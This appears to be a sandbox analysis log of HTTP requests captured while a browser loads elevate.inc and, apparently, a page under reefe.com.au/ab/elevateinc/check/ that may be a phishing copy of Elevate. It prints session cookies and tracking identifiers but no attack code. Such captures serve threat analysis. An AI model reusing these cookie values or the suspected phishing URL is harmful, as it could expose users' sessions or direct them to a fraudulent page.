Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/65937a3a0452f1b9e23ad838_logo12.webp HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d85daacb0ee65e4fec540_62abedd69e2a1d691620bb64_hrtech%2520(1).avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /use-cases/peo-software HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /use-cases/health-plans HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d7482ac5ec161a85c2_63628f1c59c33f5363f3b113_employeebenefitnews-brand-logo-color-no-padding.svg HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d85dad1c8ab250a1bb658_620a8fd2dbed87842d9c0a00_pr-newswire-logo.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d85dbc07d34d672d8712d_63628ee14a7843d2f27b559f_benefitspro-logo-865x295.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84e639c50a31518316b0_64baf3d6c359f158a0977c2d_benefitspro.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d85db79bd0e25b6f57aec_62abf1504d07fa11cd45af6f_PYMNTS-logo-green%25201%2520(1).avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/66e3279237aef04dc35516ef_benefitspro.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/66d8804d98330a06f1ef82a5_659d85dad1c8ab250a1bb658_620a8fd2dbed87842d9c0a00_pr-newswire-logo.avif HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d6a02c61fd03773aef_620a8cd05162759375e5b000_employeebenefitnews-brand-logo-initials-01.svg HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d6981620aca717f18b_645ab858fc8d736eb0ea829d_1200px-TechCrunch_logo.svg%2520(1).png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /td/rul/11308007612?random=1749250529836&cv=11&fst=1749250529836&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1host: td.doubleclick.netsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-de
Source: global traffic HTTP traffic detected: GET /integration/enabled/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94bb7f6b5a0e3594&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/lepop/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/lepop/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/578173051:1749248989:ofWsHxH2SCaqDwfYHjmWDSvWa5y_r8jGMjs_Jcmo-Ac/94bb7f676d193594/YMK7TNejmOfEtlX4Jaipa3LIa4VdQmeVzzmn5zJIJmk-1749250530-1.2.1.1-VlKBfFfT5WmzHyBGdJnzZCmt19OkBZQ5OA_dEq_hOU7RPvii9SGhWd8zbCt6y7Oh HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /test/goal HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ab/elevateinc/check/images/all.min.css HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://reefe.com.au/ab/elevateinc/check/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /attribution_trigger?pid=3682316&time=1749250530194&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: *sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0origin: https://www.elevate.incattribution-reporting-eligible: trigger=navigation-source;event-sourceattribution-reporting-support: web=ossec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=lgD7OnYtDjd6VlOs1QRygVd2wsFHvhy9ojpZsxv7QGc-1749250531-1.0.1.1-WBNCxbYHgsxZCj3wcRv91i3ijvYdkBErKDSacaX_qOp7xPIom4T8P8dspw22PVijG3v1z9Y1lb.j.pICAo4XKPADuVQWyLcJjty.4ec6.LA; _cfuvid=LOZ1ricCiAmusuCcvAhjWZDp4AwD8pwM.xDSDSWDHto-1749250531318-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /dist/web/assets/google-privacy-policy-Cb0CGVRT.svg HTTP/1.1host: 2captcha.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://reefe.com.au/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749250530194&li_adsId=71ff584c-f69a-4b49-9c70-b622d9cfe41f&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /pagead/viewthroughconversion/11308007612/?random=1749250529827&cv=11&fst=1749250529827&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: test_cookie=CheckForPermission
Source: global traffic HTTP traffic detected: GET /pagead/viewthroughconversion/11308007612/?random=1749250529836&cv=11&fst=1749250529836&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: test_cookie=CheckForPermission
Source: global traffic HTTP traffic detected: GET /ab/elevateinc/check/images/net_big.d-52893f5e.png HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://reefe.com.au/ab/elevateinc/check/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /s/0.8.9/clarity.js HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: CLID=15e084584fed44b9ac7d3d31dd5d9cd2.20250606.20260606
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/177991084:1749248960:-8Kawm3IciHVqcNU-Zpk-ui_jcGRuh1nJdIMQDlmFLA/94bb7f6409043594/fZ15QtuaFynigc5oFtv9UIzWlv64H8Euv6MNWm1fXm8-1749250529-1.2.1.1-Je8Rq7LnosMOhurC2gpYKK37AwHhO3lKPm0NE76BI6c8O0CwRQdGp2Cd4hkFHbDH HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749250530194&li_adsId=71ff584c-f69a-4b49-9c70-b622d9cfe41f&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2&cookiesTest=true HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=5644dc01-351c-4e14-b7ff-1d357614844ecookie: bcookie="v=2&bf7b89c0-f35c-4470-8d60-e42490e31dbb"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749250531:t=1749336931:v=2:sig=AQFtc4yW-KwEQoHJ1IQNpZOSDBCJoZke"priority: i
Source: global traffic HTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749250529827&cv=11&fst=1749247200000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDZpuyz6dzJ3_qA7rACDWNFiLJXUQcalFWhUfqZGSZr0ZdNUmqCYJxy&random=1854421802&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749250529836&cv=11&fst=1749247200000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDZpuyz3z_63NIbJ_BEuMxCAbSeBr_ld_ZxLX-dKHc7damxYyS-2gso&random=84112030&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority:
Source: global traffic HTTP traffic detected: GET /attribution_trigger?pid=3682316&time=1749250530194&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /dist/web/assets/google-privacy-policy-Cb0CGVRT.svg HTTP/1.1host: 2captcha.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
